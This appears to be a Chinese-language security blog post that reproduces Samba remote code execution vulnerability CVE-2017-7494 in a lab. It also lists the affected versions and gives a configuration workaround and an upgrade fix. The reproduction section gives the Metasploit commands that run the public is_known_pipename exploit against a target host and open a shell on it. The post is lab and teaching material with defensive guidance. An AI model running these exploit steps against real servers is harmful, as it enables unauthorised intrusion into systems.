漏洞簡介
Samba是在Linux和UNIX系統上實作SMB協議的一個軟體,不少IoT設備也使用了Samba,2017年5月24日Samba發布了4.6.4版本,修復了一個嚴重的遠程代碼執行漏洞,漏洞編號CVE-2017-7494,攻擊者可以利用該漏洞在目標服務器上執行任意代碼,2017年5月25日hdm給metasploit提交了該漏洞的exp,2017年5月25日openwrt發布了針對該漏洞的修復補丁,許多IoT設備同樣受該漏洞影響,
測驗環境
攻擊機:kali IP:192.168.0.10
靶 機:debian IP:192.168.0.20
服務:samba: 4.5
漏洞驗證
啟動Kali執行命令:
msfconsole
msf > use exploit/linux/samba/is_known_pipename
set RHOST 192.168.0.20
run
進入目標系統并查看檔案:
cd / ls
驗證完成
影響版本:
Samba:3.5 <4.6.4 <4.5.10 <4.4.14,
4.6.4/4.5.10/4.4.14已修復此漏洞,
修復建議:
1、臨時方案
在smb.conf的[global]節點下增加 nt pipe support = no選項,重新啟動samba服務,
2、官方修復
Samba已發布新版本,可通過更新版本解決,
補丁下載
https://www.samba.org/
此實驗僅供學習參考,不得用于其他任何目的,其他違法行為本人不負任何責任,在此申明!
轉載請註明出處,本文鏈接:https://www.uj5u.com/qiye/6891.html
標籤:訊息安全
上一篇:sudo 1.2.27 - Security Bypass
下一篇:SSL證書自簽名使用及監控